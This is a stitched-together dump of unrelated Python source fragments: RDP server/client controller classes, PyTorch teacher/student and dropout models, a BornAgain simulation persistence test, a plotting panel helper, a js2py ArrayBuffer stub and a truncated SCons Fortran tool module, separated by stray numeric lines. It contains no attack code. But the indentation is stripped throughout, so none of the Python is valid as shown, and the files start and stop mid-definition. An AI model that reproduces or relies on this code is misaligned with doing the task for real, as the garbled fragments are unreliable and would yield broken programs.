return (self.getDomain(), self.getUsername(), self.getPassword())
def getColorDepth(self):
"""
@return: color depth define by server
"""
return self._colorDepth
def getScreen(self):
"""
@return: tuple(width, height) of client asked screen
"""
bitmapCap = self._pduLayer._clientCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability
return (bitmapCap.desktopWidth.value, bitmapCap.desktopHeight.value)
def addServerObserver(self, observer):
"""
@summary: Add observer to RDP protocol
@param observer: new observer to add
"""
self._serverObserver.append(observer)
def setColorDepth(self, colorDepth):
"""
@summary: Set color depth of session
if PDU stack is already connected send a deactive-reactive sequence
and an onReady message is re send when client is ready
@param colorDepth: {integer} depth of session (15, 16, 24)
"""
self._colorDepth = colorDepth
self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value = colorDepth
if self._isReady:
#restart connection sequence
self._isReady = False
self._pduLayer.sendPDU(pdu.data.DeactiveAllPDU())
def setKeyEventUnicodeSupport(self):
"""
@summary: Enable key event in unicode format
"""
self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value |= pdu.caps.InputFlags.INPUT_FLAG_UNICODE
def onReady(self):
"""
@summary: RDP stack is now ready
"""
self._isReady = True
for observer in self._serverObserver:
observer.onReady()
def onClose(self):
"""
@summary: Event call when RDP stack is closed
"""
self._isReady = False
for observer in self._serverObserver:
observer.onClose()
def onSlowPathInput(self, slowPathInputEvents):
"""
@summary: Event call when slow path input are available
@param slowPathInputEvents: [data.SlowPathInputEvent]
"""
for observer in self._serverObserver:
for event in slowPathInputEvents:
#scan code
if event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_SCANCODE:
observer.onKeyEventScancode(event.slowPathInputData.keyCode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE), bool(event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED))
#unicode
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_UNICODE:
observer.onKeyEventUnicode(event.slowPathInputData.unicode.value, not (event.slowPathInputData.keyboardFlags.value & pdu.data.KeyboardFlag.KBDFLAGS_RELEASE))
#mouse events
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSE:
isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_DOWN
button = 0
if event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON1:
button = 1
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON2:
button = 2
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerFlag.PTRFLAGS_BUTTON3:
button = 3
observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed)
elif event.messageType.value == pdu.data.InputMessageType.INPUT_EVENT_MOUSEX:
isPressed = event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_DOWN
button = 0
if event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1:
button = 4
elif event.slowPathInputData.pointerFlags.value & pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2:
button = 5
observer.onPointerEvent(event.slowPathInputData.xPos.value, event.slowPathInputData.yPos.value, button, isPressed)
def sendUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
"""
@summary: send bitmap update
@param destLeft: xmin position
@param destTop: ymin position
@param destRight: xmax position because RDP can send bitmap with padding
@param destBottom: ymax position because RDP can send bitmap with padding
@param width: width of bitmap
@param height: height of bitmap
@param bitsPerPixel: number of bit per pixel
@param isCompress: use RLE compression
@param data: bitmap data
"""
if not self._isReady:
return
bitmapData = pdu.data.BitmapData(destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, data)
if isCompress:
bitmapData.flags.value = pdu.data.BitmapFlag.BITMAP_COMPRESSION
self._pduLayer.sendBitmapUpdatePDU([bitmapData])
class ClientFactory(layer.RawLayerClientFactory):
"""
@summary: Factory of Client RDP protocol
@param reason: twisted reason
"""
def connectionLost(self, csspLayer, reason):
#retrieve controller
tpktLayer = csspLayer._layer
x224Layer = tpktLayer._presentation
mcsLayer = x224Layer._presentation
secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL]
pduLayer = secLayer._presentation
controller = pduLayer._listener
controller.onClose()
def buildRawLayer(self, addr):
"""
@summary: Function call from twisted and build rdp protocol stack
@param addr: destination address
"""
controller = RDPClientController()
self.buildObserver(controller, addr)
return controller.getProtocol()
def buildObserver(self, controller, addr):
"""
@summary: Build observer use for connection
@param controller: RDPClientController
@param addr: destination address
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ClientFactory"))
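# Typical wiring (a hedged sketch based on rdpy's factory pattern; MyObserver
# is a hypothetical RDPClientObserver subclass defined by the application):
#
#   class MyFactory(ClientFactory):
#       def buildObserver(self, controller, addr):
#           controller.setUsername("user")
#           controller.setPassword("secret")
#           return MyObserver(controller)
#
#   from twisted.internet import reactor
#   reactor.connectTCP("192.168.1.10", 3389, MyFactory())
#   reactor.run()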
class ServerFactory(layer.RawLayerServerFactory):
"""
@summary: Factory of Server RDP protocol
"""
def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None):
"""
@param colorDepth: color depth of session
@param privateKeyFileName: file contain server private key (if none -> back to standard RDP security)
@param certficiateFileName: file that contain public key (if none -> back to standard RDP security)
"""
self._colorDepth = colorDepth
self._privateKeyFileName = privateKeyFileName
self._certificateFileName = certificateFileName
def connectionLost(self, tpktLayer, reason):
"""
@param reason: twisted reason
"""
#retrieve controller
x224Layer = tpktLayer._presentation
mcsLayer = x224Layer._presentation
secLayer = mcsLayer._channels[mcs.Channel.MCS_GLOBAL_CHANNEL]
pduLayer = secLayer._presentation
controller = pduLayer._listener
controller.onClose()
def buildRawLayer(self, addr):
"""
@summary: Function call from twisted and build rdp protocol stack
@param addr: destination address
"""
controller = RDPServerController(self._colorDepth, self._privateKeyFileName, self._certificateFileName)
self.buildObserver(controller, addr)
return controller.getProtocol()
def buildObserver(self, controller, addr):
"""
@summary: Build observer use for connection
@param controller: RDP stack controller
@param addr: destination address
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "buildObserver", "ServerFactory"))
class RDPClientObserver(object):
"""
@summary: Class use to inform all RDP event handle by RDPY
"""
def __init__(self, controller):
"""
@param controller: RDP controller use to interact with protocol
"""
self._controller = controller
self._controller.addClientObserver(self)
def onReady(self):
"""
@summary: Stack is ready and connected
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPClientObserver"))
def onSessionReady(self):
"""
@summary: Windows session is ready
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onSessionReady", "RDPClientObserver"))
def onClose(self):
"""
        @summary: Stack is closed
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver"))
def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
"""
@summary: Notify bitmap update
@param destLeft: xmin position
@param destTop: ymin position
@param destRight: xmax position because RDP can send bitmap with padding
@param destBottom: ymax position because RDP can send bitmap with padding
@param width: width of bitmap
@param height: height of bitmap
@param bitsPerPixel: number of bit per pixel
@param isCompress: use RLE compression
@param data: bitmap data
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onUpdate", "RDPClientObserver"))
class RDPServerObserver(object):
"""
@summary: Class use to inform all RDP event handle by RDPY
"""
def __init__(self, controller):
"""
@param controller: RDP controller use to interact with protocol
"""
self._controller = controller
self._controller.addServerObserver(self)
def onReady(self):
"""
@summary: Stack is ready and connected
        May be called after a setColorDepth call too
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onReady", "RDPServerObserver"))
def onClose(self):
"""
        @summary: Stack is closed
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onClose", "RDPClientObserver"))
def onKeyEventScancode(self, code, isPressed, isExtended):
"""
@summary: Event call when a keyboard event is catch in scan code format
@param code: {integer} scan code of key
@param isPressed: {boolean} True if key is down
@param isExtended: {boolean} True if a special key
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventScanCode", "RDPServerObserver"))
def onKeyEventUnicode(self, code, isPressed):
"""
@summary: Event call when a keyboard event is catch in unicode format
@param code: unicode of key
@param isPressed: True if key is down
"""
raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onKeyEventUnicode", "RDPServerObserver"))
def onPointerEvent(self, x, y, button, isPressed):
"""
@summary: Event call on mouse event
@param x: x position
@param y: y position
@param button: 1, 2, 3, 4 or 5 button
@param isPressed: True if mouse button is pressed
"""
        raise CallPureVirtualFuntion("%s:%s defined by interface %s"%(self.__class__, "onPointerEvent", "RDPServerObserver"))
# MIT License
#
# Copyright (c) 2018 Jonathan Lorraine, Google LLC
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from .unet import UNet
from .resnet import ResNet18
class CBRStudent(nn.Module):
def __init__(self, num_channels, num_classes):
super(CBRStudent, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
fcsize = 64 if num_channels == 1 else 256
self.fc_pi = nn.Linear(fcsize, num_classes)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
out_pi = self.fc_pi(out)
return out_pi
class UNetTeacher(nn.Module):
def __init__(self, num_channels, args):
super(UNetTeacher, self).__init__()
self.unet = UNet(in_channels=num_channels, n_classes=1, depth=2, wf=3, padding=True,
batch_norm=True, do_noise_channel=False, up_mode='upsample',use_identity_residual=False)
self.bg_weight = args.bg
self.min_std = args.min_std
self.max_std = args.max_std
self.use_exp = args.use_exp
self.dataset = args.dataset
def forward(self, x):
out = self.unet(x).squeeze() # should be of shape N x H x W
# print(out.shape)
        out = F.softmax(out.reshape(x.size(0), -1), dim=1)
out = out.reshape(x.size(0), x.size(2), x.size(3)).unsqueeze(1)
out = out.repeat(1, 2, 1, 1) # shape N x 2 x H x W
meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3)))
mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda()
mesh = mesh.repeat(x.size(0), 1,1,1) # shape N x 2 x H x W
mean = torch.sum(out*mesh, dim=[2,3]) # shape N x 2
std = self.min_std
mask = self.bg_weight + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2), dim=1))
return mask.unsqueeze(1)
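# The mask above is a soft spatial attention map: for each pixel p,
#   mask(p) = bg_weight + exp(-||p - mean||^2 / (2 * std^2))
# where `mean` is the softmax-weighted centroid of the UNet output. A one-point
# sketch of the same computation (illustrative values; nothing assumed beyond torch):
#
#   mean, p = torch.tensor([3.0, 4.0]), torch.tensor([3.0, 6.0])
#   mask_p = 0.5 + torch.exp(-((mean - p) ** 2).sum() / (2 * 2.0 ** 2))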
class CBRTeacher(nn.Module):
def __init__(self, num_channels):
super(CBRTeacher, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(num_channels, 32, kernel_size=5, stride=2, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
self.layer2 = nn.Sequential(
nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2))
fcsize = 64 if num_channels == 1 else 256
self.fc_cent = nn.Linear(fcsize, 2)
self.fc_std = nn.Linear(fcsize, 2)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.reshape(out.size(0), -1)
mean = x.size(2)//2 + x.size(2)//2*torch.tanh(self.fc_cent(out))
std = 2 + 10*torch.sigmoid(self.fc_std(out))
# print(mean.mean(dim=0), std.mean(dim=0))
meshgrid_x, meshgrid_y = torch.meshgrid(torch.arange(x.size(2)),torch.arange(x.size(3)))
mesh = torch.stack([meshgrid_x, meshgrid_y], dim=0).unsqueeze(0).cuda()
mesh = mesh.repeat(x.size(0), 1,1,1)
mask = 0.5 + torch.exp(torch.sum(-1*(mean.view(-1,2, 1,1) - mesh)**2 / (2*std**2).view(-1,2,1,1), dim=1))
print(mean.mean(), mean.std(),std.mean(), std.std())
return mask.unsqueeze(1).repeat(1, x.size(1), 1, 1)
class GaussianDropout(nn.Module):
def __init__(self, dropout):
super(GaussianDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
"""
Sample noise e ~ N(1, alpha)
Multiply noise h = h_ * e
"""
# N(1, alpha)
if self.training:
dropout = F.sigmoid(self.dropout)
if x.is_cuda:
epsilon = torch.randn(x.size()).cuda() * (dropout / (1 - dropout)) + 1
else:
epsilon = torch.randn(x.size()) * (dropout / (1 - dropout)) + 1
return x * epsilon
else:
'''
epsilon = torch.randn(x.size()).double() * (model.dropout / (1 - model.dropout)) + 1
if x.is_cuda:
epsilon = epsilon.cuda()
return x * epsilon
'''
return x
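# Note on the noise above: `self.dropout` is treated as a logit, so the
# effective rate is p = sigmoid(dropout), and at train time activations are
# multiplied by epsilon ~ N(1, sigma^2) with sigma = p / (1 - p). A minimal
# usage sketch (assumes `dropout` is passed as a tensor so sigmoid applies):
#
#   gd = GaussianDropout(torch.tensor(0.0))   # p = sigmoid(0) = 0.5
#   gd.train()                                # noise is only applied in training
#   y = gd(torch.randn(8, 128))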
class BernoulliDropout(nn.Module):
def __init__(self, dropout):
super(BernoulliDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
"""
        Sample a relaxed Bernoulli gate a (concrete / Gumbel-sigmoid relaxation
        with keep rate sigmoid(dropout) and temperature 0.5)
        Multiply noise h = h_ * a
"""
temperature = 0.5
# N(1, alpha)
if self.training:
u = Variable(torch.rand(x.size()))
if x.is_cuda:
u = u.cuda()
z = F.sigmoid(self.dropout) + torch.log(u / (1 - u))
a = F.sigmoid(z / temperature)
return x * a
else:
return x
class reshape(nn.Module):
def __init__(self, size):
super(reshape, self).__init__()
self.size = size
def forward(self, x):
return x.view(-1, self.size)
class SimpleConvNet(nn.Module):
def __init__(self, batch_norm=True, dropType='bernoulli', conv_drop1=0.0, conv_drop2=0.0, fc_drop=0.0):
super(SimpleConvNet, self).__init__()
self.batch_norm = batch_norm
self.dropType = dropType
if dropType == 'bernoulli':
self.conv1_dropout = nn.Dropout(conv_drop1)
self.conv2_dropout = nn.Dropout(conv_drop2)
self.fc_dropout = nn.Dropout(fc_drop)
elif dropType == 'gaussian':
self.conv1_dropout = GaussianDropout(conv_drop1)
self.conv2_dropout = GaussianDropout(conv_drop2)
self.fc_dropout = GaussianDropout(fc_drop)
if batch_norm:
self.layer1 = nn.Sequential(
nn.Conv2d(1, 16, kernel_size=5, padding=2),
nn.BatchNorm2d(16),
nn.ReLU(),
self.conv1_dropout,
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=5, padding=2),
nn.BatchNorm2d(32),
nn.ReLU(),
self.conv2_dropout,
nn.MaxPool2d(2))
else:
self.layer1 = nn.Sequential(
nn.Conv2d(1, 16, kernel_size=5, padding=2),
nn.ReLU(),
self.conv1_dropout,
nn.MaxPool2d(2))
self.layer2 = nn.Sequential(
nn.Conv2d(16, 32, kernel_size=5, padding=2),
nn.ReLU(),
self.conv2_dropout,
nn.MaxPool2d(2))
self.fc = nn.Linear(7*7*32, 10)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = out.view(out.size(0), -1)
out = self.fc_dropout(self.fc(out))
return out
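# Shape sketch (illustrative): for a 1x28x28 MNIST-style input, each conv block
# keeps the spatial size (kernel 5, padding 2) and MaxPool2d(2) halves it,
# so 28 -> 14 -> 7 and the flattened size is 7*7*32, matching self.fc above.
#
#     net = SimpleConvNet(batch_norm=True, dropType='bernoulli')
#     logits = net(torch.randn(2, 1, 28, 28))  # -> shape (2, 10)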
class CNN(nn.Module):
def __init__(self, num_layers, dropout, size, weight_decay, in_channel, imsize, do_alexnet=False, num_classes=10):
super(CNN, self).__init__()
self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True)
self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True)
self.do_alexnet = do_alexnet
self.num_classes = num_classes
self.in_channel = in_channel
self.imsize = imsize
if self.do_alexnet:
self.features = nn.Sequential(
nn.Conv2d(self.in_channel, 64, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 192, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(192, 384, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(384, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
if imsize == 32:
self.view_size = 256 * 2 * 2
elif imsize == 28:
self.view_size = 256
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(self.view_size, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, self.num_classes),
)
else:
self.features = nn.Sequential(
nn.Conv2d(self.in_channel, 20, kernel_size=3, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2),
)
if imsize == 32:
self.view_size = 20 * 8 * 8
elif imsize == 28:
self.view_size = 980
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(self.view_size, 250),
nn.ReLU(inplace=True),
#nn.Dropout(),
#nn.Linear(250, 250),
#nn.ReLU(inplace=True),
nn.Linear(250, self.num_classes),
)
def do_train(self):
self.features.train()
self.classifier.train()
    def do_eval(self):
        # switch to eval mode (mirrors Net.do_eval below)
        self.features.eval()
        self.classifier.eval()
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
def L2_loss(self):
loss = 0
for p in self.parameters():
loss += torch.sum(torch.mul(p, p))
return loss * (10 ** self.weight_decay)
def all_L2_loss(self):
loss = 0
count = 0
for p in self.parameters():
#val = torch.flatten(p) - self.weight_decay[count: count + p.numel()]
loss += torch.sum(
torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p))))
#loss += 1e-3 * torch.sum(torch.mul(val, val))
count += p.numel()
return loss
class Net(nn.Module):
def __init__(self, num_layers, dropout, size, channel, weight_decay, num_classes=10, do_res=False,
do_classification=True):
super(Net, self).__init__()
self.dropout = Variable(torch.FloatTensor([dropout]), requires_grad=True)
self.weight_decay = Variable(torch.FloatTensor([weight_decay]), requires_grad=True)
self.imsize = size * size * channel
if not do_classification: self.imsize = size * channel
self.do_res = do_res
l_sizes = [self.imsize, self.imsize] + [50] * 20
network = []
# self.Gaussian = BernoulliDropout(self.dropout)
# network.append(nn.Dropout())
for i in range(num_layers):
network.append(nn.Linear(l_sizes[i], l_sizes[i + 1]))
# network.append(self.Gaussian)
network.append(nn.ReLU())
#network.append(nn.Dropout())
network.append(nn.Linear(l_sizes[num_layers], num_classes))
self.net = nn.Sequential(*network)
def forward(self, x):
cur_shape = x.shape
if not self.do_res:
return self.net(x.view(-1, self.imsize))# .reshape(cur_shape)
else:
res = self.net(x.view(-1, self.imsize)).reshape(cur_shape)
return x + res
def do_train(self):
self.net.train()
def do_eval(self):
self.net.eval()
def L2_loss(self):
loss = .0
for p in self.parameters():
loss = loss + torch.sum(torch.mul(p, p)) * torch.exp(self.weight_decay)
return loss
def all_L2_loss(self):
loss = .0
count = 0
for p in self.parameters():
loss = loss + torch.sum(
torch.mul(torch.exp(self.weight_decay[count: count + p.numel()]), torch.flatten(torch.mul(p, p))))
count += p.numel()
return loss
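# Illustrative sketch (assumes self.weight_decay has been reassigned to a 1-D
# vector with one entry per parameter element): all_L2_loss computes
# sum_i exp(wd_i) * p_i**2, a per-weight L2 penalty whose log-coefficients can
# themselves be optimised.
#
#     net = Net(num_layers=1, dropout=0.0, size=28, channel=1, weight_decay=-3.0)
#     n_params = sum(p.numel() for p in net.parameters())
#     net.weight_decay = Variable(torch.zeros(n_params), requires_grad=True)
#     penalty = net.all_L2_loss()  # scalar, differentiable in weights and weight_decay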
| 0.004618 |
"""
Turns a Python example into a functional persistence test via CMake machinery.
"""
import sys
import os
import glob
sys.path.append("@CMAKE_LIBRARY_OUTPUT_DIRECTORY@")
import bornagain as ba
REFERENCE_DIR = "@PYPERSIST_REFERENCE_DIR@"
EXAMPLE_DIR = "@EXAMPLE_DIR@"
EXAMPLE_NAME = "@EXAMPLE_NAME@"
OUTPUT_DIR = "@OUTPUT_DIR@"
TOLERANCE = @PYPERSIST_TOLERANCE@
sys.path.append(EXAMPLE_DIR)
example = __import__(EXAMPLE_NAME)
simulationObject = None
def get_simulation_SpecularSimulation():
"""
Returns custom simulation for SpecularSimulation.py.
"""
simulation = example.get_simulation(scan_size=10)
return simulation
def get_simulation_DepthProbe():
"""
Returns custom simulation in the case of depth probe.
"""
simulation = example.get_simulation()
beam = simulation.getInstrument().getBeam()
wavelength = beam.getWavelength()
incl_axis = simulation.getAlphaAxis()
z_axis = simulation.getZAxis()
footprint = beam.footprintFactor()
simulation.setBeamParameters(
wavelength, 10, incl_axis.getMin(), incl_axis.getMax(), footprint)
simulation.setZSpan(10, z_axis.getMin(), z_axis.getMax())
return simulation
def get_simulation_RectangularGrating():
"""
Returns custom simulation for RectangularGrating.py.
    Contains a smaller detector to keep MC integration stable on all platforms.
"""
simulation = example.get_simulation()
simulation.setDetectorParameters(5, -0.01*ba.deg, 0.01*ba.deg, 6, 0.0, 0.02*ba.deg)
return simulation
def get_simulation_GenericExample():
"""
    Returns a minified simulation for the majority of examples; only the detector size is adjusted.
    The idea is that all other example settings related to the simulation (MC integration flags,
    thread settings etc.) remain intact.
"""
simulation = example.get_simulation()
detector = simulation.getInstrument().getDetector()
    # preserve the axes range while using fewer bins
ax = detector.getAxis(0)
ay = detector.getAxis(1)
xmin, xmax = ax.getMin(), ax.getMax()
ymin, ymax = ay.getMin(), ay.getMax()
simulation.setDetectorParameters(5, xmin, xmax, 6, ymin, ymax)
return simulation
def get_minified_simulation():
"""
Returns a simulation constructed from example simulation with smaller detector.
"""
if "ex06_Reflectometry" in EXAMPLE_DIR:
return get_simulation_SpecularSimulation()
elif EXAMPLE_NAME == "RectangularGrating":
return get_simulation_RectangularGrating()
elif EXAMPLE_NAME == "DepthProbe":
return get_simulation_DepthProbe()
else:
return get_simulation_GenericExample()
def adjusted_simulation():
"""
Returns pre-calculated minified simulation. Function is intended for
injection into python example file.
"""
global simulationObject
return simulationObject
def run_simulation():
"""
Runs simulation and returns resulting intensity map.
"""
# create minified simulation object
global simulationObject
simulationObject = get_minified_simulation()
# INJECTION HERE: replacing get_simulation() method of example with local method
example.get_simulation = adjusted_simulation
return example.run_simulation()
def get_reffile_name(example_name):
"""
Returns full name of reference file for given basename
"""
reffiles = glob.glob(os.path.join(REFERENCE_DIR, example_name+".int.gz"))
if len(reffiles) != 1:
print("Can't find reference file in '{0}' for name '{1}'".format(REFERENCE_DIR, example_name))
print("Possible candidates", reffiles)
return None
return reffiles[0]
def save_result(result, filename):
"""
Writing result to the file with given name into test output directory.
"""
fullname = os.path.join(OUTPUT_DIR, filename)
print("Writing results in '{0}'".format(fullname))
try:
ba.IntensityDataIOFactory.writeSimulationResult(result, fullname)
except Exception as err:
print("Exception caught, failed to write file", err)
def check_result(result, example_name):
print("Checking results for '{}'".format(example_name))
reffile = get_reffile_name(example_name)
if not reffile:
save_result(result, example_name+".int.gz")
raise Exception("Absent reference file")
print("Loading reference file '{}'".format(reffile))
reference = ba.IntensityDataIOFactory.readOutputData(reffile)
diff = ba.getRelativeDifference(ba.importArrayToOutputData(result.array()), reference)
if diff > TOLERANCE:
print("Failure - Difference {0} is above tolerance level {1}".format(diff, TOLERANCE))
reffile_basename = os.path.basename(reffile)
save_result(result, reffile_basename)
raise Exception("Tolerance exceeded")
else:
print("Success - Difference {0} is below tolerance level{1}".format(diff, TOLERANCE))
def process_result(result, example_name):
try:
check_result(result, example_name)
return 0
except Exception:
return 1
def process_example():
result = run_simulation()
nfailures = 0
if type(result) is dict:
for dict_key, subresult in result.items():
nfailures += process_result(subresult, EXAMPLE_NAME + "." + str(dict_key))
else:
nfailures += process_result(result, EXAMPLE_NAME)
return nfailures
if __name__ == '__main__':
sys.exit(process_example())
| 0.002372 |
from . import header
def panel(idx,**args):
'''Switch to panel idx.
The nx,ny (and optionally gapx,gapy, and start) parameters should only
be set for the first call to panel(). Thereafter, those values will be
remembered.
There are nx,ny panels in a grid. The space between panels in the
x and y directions is controlled by gapx and gapy. By default, panels
are counted from the top left going across, then down. To start at
the bottom left going across and up, set the start keyword to 'bottom'.
idx - Current panel number, (starts counting at 1)
Optional **args:
nx - Number of panels in x direction (defaults to 1)
ny - Number of panels in y direction (defaults to 1)
gapx - space between panels in the x direction (defaults to 2)
gapy - space between panels in the y direction (defaults to 2)
start - Panel number 1 will be at the top-left ('top') or bottom-left
('bottom'). Defaults to 'top' '''
_allowed = ['nx','ny','gapx','gapy','start']
fp = header._wipopen('panel',args.keys(),_allowed)
if args.has_key('nx') and args.has_key('ny'): # start new panels
header._panelobj.resize(**args)
fp.write('set xsubmar %f\n' %header._panelobj.gapx)
fp.write('set ysubmar %f\n' %header._panelobj.gapy)
elif args.has_key('nx') or args.has_key('ny'):
header._error('panel(): you must specify nx and ny!')
if idx not in range(1,header._panelobj.nx*header._panelobj.ny+1):
header._error('panel(): idx must be between 1 and nx*ny!')
header._panelobj.idx = idx - 1
if header._panelobj.start == 'top':
fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,-1*idx))
else:
fp.write('panel %d %d %d\n' %(header._panelobj.nx,header._panelobj.ny,idx))
fp.write('color %s\n' %header._optionsobj.color)
fp.write('font %s\n' %header._optionsobj.font)
fp.write('expand %s\n' %header._optionsobj.size)
fp.write('lstyle %s\n' %header._optionsobj.lstyle)
fp.write('lwidth %s\n' %header._optionsobj.lwidth)
fp.write('bgci %s\n' %header._optionsobj.bg)
fp.close()
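# Usage sketch (illustrative): set up a 2x2 grid on the first call, then switch
# panels by index alone; nx/ny and the gaps are remembered by header._panelobj.
#
#     panel(1, nx=2, ny=2, gapx=2, gapy=2)  # top-left panel
#     # ...plot commands for panel 1...
#     panel(2)                              # top-right panel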
| 0.024691 |
# this is based on jsarray.py
# todo check everything :)
from ..base import *
try:
import numpy
except ImportError:  # numpy is optional here
pass
@Js
def ArrayBuffer():
a = arguments[0]
if isinstance(a, PyJsNumber):
length = a.to_uint32()
if length!=a.value:
raise MakeError('RangeError', 'Invalid array length')
temp = Js(bytearray([0]*length))
return temp
return Js(bytearray([0]))
ArrayBuffer.create = ArrayBuffer
ArrayBuffer.own['length']['value'] = Js(None)
ArrayBuffer.define_own_property('prototype', {'value': ArrayBufferPrototype,
'enumerable': False,
'writable': False,
'configurable': False})
ArrayBufferPrototype.define_own_property('constructor', {'value': ArrayBuffer,
'enumerable': False,
'writable': False,
'configurable': True})
| 0.008499 |
"""SCons.Tool.ifl
Tool-specific initialization for the Intel Fortran compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/ifl.py 5023 2010/06/14 22:05:46 scons"
import SCons.Defaults
from SCons.Scanner.Fortran import FortranScan
from FortranCommon import add_all_to_env
def generate(env):
"""Add Builders and construction variables for ifl to an Environment."""
fscan = FortranScan("FORTRANPATH")
SCons.Tool.SourceFileScanner.add_scanner('.i', fscan)
SCons.Tool.SourceFileScanner.add_scanner('.i90', fscan)
if 'FORTRANFILESUFFIXES' not in env:
env['FORTRANFILESUFFIXES'] = ['.i']
else:
env['FORTRANFILESUFFIXES'].append('.i')
